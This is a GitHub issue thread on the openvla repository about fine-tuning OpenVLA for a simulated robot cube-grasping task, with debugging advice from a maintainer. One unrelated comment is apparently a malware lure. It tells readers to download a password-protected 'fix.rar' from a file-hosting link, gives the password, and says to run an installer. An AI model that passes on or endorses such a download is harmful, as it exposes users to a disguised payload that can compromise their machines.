openvla/openvla #79: Question about fine-tuning advices

MagdalenaKotynia, 2024-08-26:
Hello, thank you for your work on openvla!
I am trying to fine-tune openVLA. Some key informations:
* trained on one task: put red cube in box
* randomized the cube position
* trained on 100 epochs, each with ~70 steps
* trained on 2 x 4090 RTX, each with 24GB vRAM
* simulated robot:  Franka Emika Panda
* fine-tuning parameters: lr = 2e-5, batch_size = 1 (due to limited compute resources), grad_acc_steps = 16, lora_rank = 128

Train logs look like that:
[image]

Here is a video with a few examples of inference of fine-tuned model (both cube positions are from training dataset)
[openvla_cut2.webm](https://github.com/user-attachments/assets/c5d87cb8-2b06-403f-b107-9581a9f7785c)

The arm is getting close to the cube but does not succeed in gripping it. Do you have any advice for improving our fine-tuning setup that may help to successfully complete the task? We are planning to try a larger dataset and more steps per episode. What number of episodes and steps per episode do you recommend for such task?

kpertsch, 2024-08-26:
Thanks for reaching out -- this looks pretty cool!
One basic debugging step would be to load some of the training images in your inference pipeline and feed them into the model right before your call the action prediction function and then verify that the results are matching the L1 error you saw during training. It's also really important to match the training setup, eg if you ran some image pre-processing / resizing / augmentation. Esp for sim data where there is 0 variation in lighting etc getting the nuances of the preprocessing pipeline right matters (like using the exact same resizing pipeline for example). You can check out the example Bridge inference script we recently added to the repo to see how we run inference.

Another thing I noticed is that the controller seems to overshoot (you can see that OpenVLA runs slow and the robot "wiggles back" after taking an action) -- this is not something we typically see in sim since the env usually waits for the model to predict an action so it doesn't matter how slow the inference is. Did you try whether you can successfully replay a training trajectory at the inference speed of OpenVLA and still solve the task?

Saschl, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

MagdalenaKotynia, 2024-08-27:
@kpertsch Thank you very much for the answer. I have debugged the train and inference preprocessing pipelines, which seem to produce the same output. Moreover, our inference pipeline is based on your inference script from README so, as I understand there shouldn't be a mismatch between train and inference preprocessing (if I don't use any custom preprocessing), or am I missing something?

Yes, we can successfully reply our trajectory from the training dataset. "Wiggling back" is caused by how our current simulation works. The robot gets an action from openvla, executes it (updates the state with the action and moves the arm to the new state by MoveIt), and then waits for the next action. The frequency of image publishing is set to be slower than the frequency of openvla inference to make sure that every action is completed.

closed 2024-09-12 by kpertsch

MagdalenaKotynia, 2024-09-16:
Hi @kpertsch! Thank you for the information, the new feature sounds very good! For now, we have stopped experimenting on OpenVLA and switched to more conventional approaches but I will remember about the new feature if we decide to continue work on OpenVLA fine-tuning in the future. If you are interested in tools connecting AI with robotics, I encourage you to see [RAI](https://github.com/RobotecAI/rai) - our AI agent framework for robotics.